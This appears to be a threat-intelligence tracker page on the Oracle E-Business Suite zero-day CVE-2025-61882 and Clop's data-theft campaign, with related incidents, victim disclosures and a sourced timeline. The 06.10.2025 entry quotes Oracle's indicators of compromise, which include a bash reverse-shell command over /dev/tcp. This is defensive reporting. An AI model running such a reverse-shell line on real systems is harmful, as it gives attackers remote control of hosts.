Oracle E-Business Suite actively exploited unauthenticated RCE (CVE-2025-61882)
Vulnerability
Summary
Hide ▲
Show ▼
CVE-2025-61882 is a critical zero-day in Oracle E-Business Suite that enabled unauthenticated remote code execution and was actively exploited in Clop data theft activity. The flaw affects Oracle Concurrent Processing / BI Publisher Integration and poses immediate risk to exposed systems. Oracle issued an emergency update, and the exploit material tied to the abuse also circulated publicly. Google Threat Intelligence Group (GTIG) and Mandiant assessed that the campaign likely began targeting Oracle EBS as early as August 9, 2025, with significant data exfiltration and extortion emails observed from September 29. The latest report adds that the University of Phoenix disclosed a breach affecting 3,489,274 individuals after unauthorized access to its Oracle E-Business Suite (EBS) financial application during August 13-22, 2025. The institution said the stolen information included names and contact information, dates of birth, Social Security numbers, and bank account and routing numbers. Investigators found the intrusion was not detected until November 21, and the university filed notice in early December and offered identity protection services to affected individuals. The attack is believed to be part of the broader Clop campaign exploiting CVE-2025-61882 across more than 100 organizations.
Cases
Related Happenings
Oracle WebLogic Server CVE-2026-21962 rapid exploitation wave
Exploitation Wave
First: 26.03.2026 18:00
Last: 26.03.2026 18:00
Sources 1
About this happening:
**Oracle WebLogic Server** systems faced a rapid **CVE-2026-21962** exploitation wave after public exploit code appeared, creating immediate **RCE risk** for exposed servers. The...
Oracle WebLogic Server CVE-2026-21962 rapid exploitation wave
Exploitation WaveAbout this happening: **Oracle WebLogic Server** systems faced a rapid **CVE-2026-21962** exploitation wave after public exploit code appeared, creating immediate **RCE risk** for exposed servers. The...
Madison Square Garden hit by network compromise linked to Cl0p
Incident
First: 02.03.2026 15:53
Last: 02.03.2026 15:53
Sources 1
About this happening:
**Madison Square Garden** confirmed a **data breach** that exposed **names and SSNs**, and it has started notifying affected people. The compromise involved a **hosted Oracle E-Bu...
Madison Square Garden hit by network compromise linked to Cl0p
IncidentAbout this happening: **Madison Square Garden** confirmed a **data breach** that exposed **names and SSNs**, and it has started notifying affected people. The compromise involved a **hosted Oracle E-Bu...
Cl0p Oracle E-Business Suite zero-day extortion campaign
Campaign
First: 02.03.2026 15:53
Last: 02.03.2026 15:53
Sources 1
About this happening:
The **Cl0p ransomware and extortion group** is running an **Oracle E-Business Suite** extortion campaign that used **zero-day vulnerabilities** to access data from **more than 100...
Cl0p Oracle E-Business Suite zero-day extortion campaign
CampaignAbout this happening: The **Cl0p ransomware and extortion group** is running an **Oracle E-Business Suite** extortion campaign that used **zero-day vulnerabilities** to access data from **more than 100...
SolarWinds Web Help Desk (WHD) multi-stage exploitation wave
Exploitation Wave
First: 09.02.2026 16:42
Last: 09.02.2026 16:42
Sources 1
About this happening:
**SolarWinds Web Help Desk (WHD)** exploitation is a **multi-stage intrusion wave** affecting **internet-exposed WHD instances**. The foothold remains unconfirmed, but the wave is...
SolarWinds Web Help Desk (WHD) multi-stage exploitation wave
Exploitation WaveAbout this happening: **SolarWinds Web Help Desk (WHD)** exploitation is a **multi-stage intrusion wave** affecting **internet-exposed WHD instances**. The foothold remains unconfirmed, but the wave is...
Latest development: 10.03.2026 08:17
CISA added CVE-2025-26399 in SolarWinds Web Help Desk to its Known Exploited Vulnerabilities (KEV) catalog after evidence of active exploitation, said Microsoft and Huntress had reported threat actors using SolarWinds Web Help Desk flaws to obtain initial access, attributed the activity to the Warlock ransomware crew, and ordered Federal Civilian Executive Branch (FCEB) agencies to apply the fix by March 12, 2026.
CISA KEV remediation deadline for SolarWinds WHD CVE-2025-40551
Public Sector Action
First: 04.02.2026 07:50
Last: 04.02.2026 07:50
Sources 1
About this happening:
**CISA** added **CVE-2025-40551** in **SolarWinds Web Help Desk** to the **KEV catalog** and imposed **federal remediation deadlines**, turning a newly exploited flaw into a compl...
CISA KEV remediation deadline for SolarWinds WHD CVE-2025-40551
Public Sector ActionAbout this happening: **CISA** added **CVE-2025-40551** in **SolarWinds Web Help Desk** to the **KEV catalog** and imposed **federal remediation deadlines**, turning a newly exploited flaw into a compl...
Timeline
-
13.10.2025 14:14 5 articles · 7mo ago
Harvard University linked to Oracle E-Business Suite zero-day breach
Victim Impact UpdateHarvard University is investigating a data breach tied to Oracle E-Business Suite CVE-2025-61882 after Clop added Harvard to its data leak site and said it would release the university’s data; Harvard said the affected activity appears limited to a small administrative unit, that it applied Oracle’s patch to remediate the vulnerability, and that it has no evidence of compromise to other University systems.
Show sources
- Harvard investigating breach linked to Oracle zero-day exploit — www.bleepingcomputer.com — 13.10.2025 14:14
- Logitech confirms data breach after Clop extortion attack — www.bleepingcomputer.com — 15.11.2025 00:18
- Dartmouth College confirms data breach after Clop extortion attack — www.bleepingcomputer.com — 25.11.2025 13:12
- Barts Health NHS discloses data breach after Oracle zero-day hack — www.bleepingcomputer.com — 05.12.2025 20:55
- Clop Ransomware Group Linked to 3.5m University of Phoenix Breach — www.infosecurity-magazine.com — 23.12.2025 18:00
-
06.10.2025 04:37 5 articles · 7mo ago
Oracle discloses and patches CVE-2025-61882 in Oracle E-Business Suite
Initial DisclosureOracle warned that CVE-2025-61882 is a critical Oracle E-Business Suite zero-day in Oracle Concurrent Processing (BI Publisher Integration) with a CVSS base score of 9.8, remotely exploitable without authentication and capable of remote code execution, affecting versions 12.2.3-12.2.14. Oracle released an emergency update and said customers may need to install the October 2023 Critical Patch Update first; the same vulnerability was tied to Clop data theft activity in August 2025, and Oracle published indicators of compromise including `200[.]107[.]207[.]26`, `185[.]181[.]60[.]11`, and `sh -c /bin/bash -i >& /dev/tcp// 0>&1` that matched the exploit archive shared on Telegram.
Show sources
- Oracle patches EBS zero-day exploited in Clop data theft attacks — www.bleepingcomputer.com — 06.10.2025 04:37
- Oracle patches EBS zero-day exploited in Clop data theft attacks — www.bleepingcomputer.com — 06.10.2025 04:37
- NCSC: Patch Critical Oracle EBS Bug Now — www.infosecurity-magazine.com — 07.10.2025 12:45
- Clop exploited Oracle zero-day for data theft since early August — www.bleepingcomputer.com — 07.10.2025 20:27
- Google: Clop Accessed “Significant Amount” of Data in Oracle EBS Exploit — www.infosecurity-magazine.com — 10.10.2025 13:15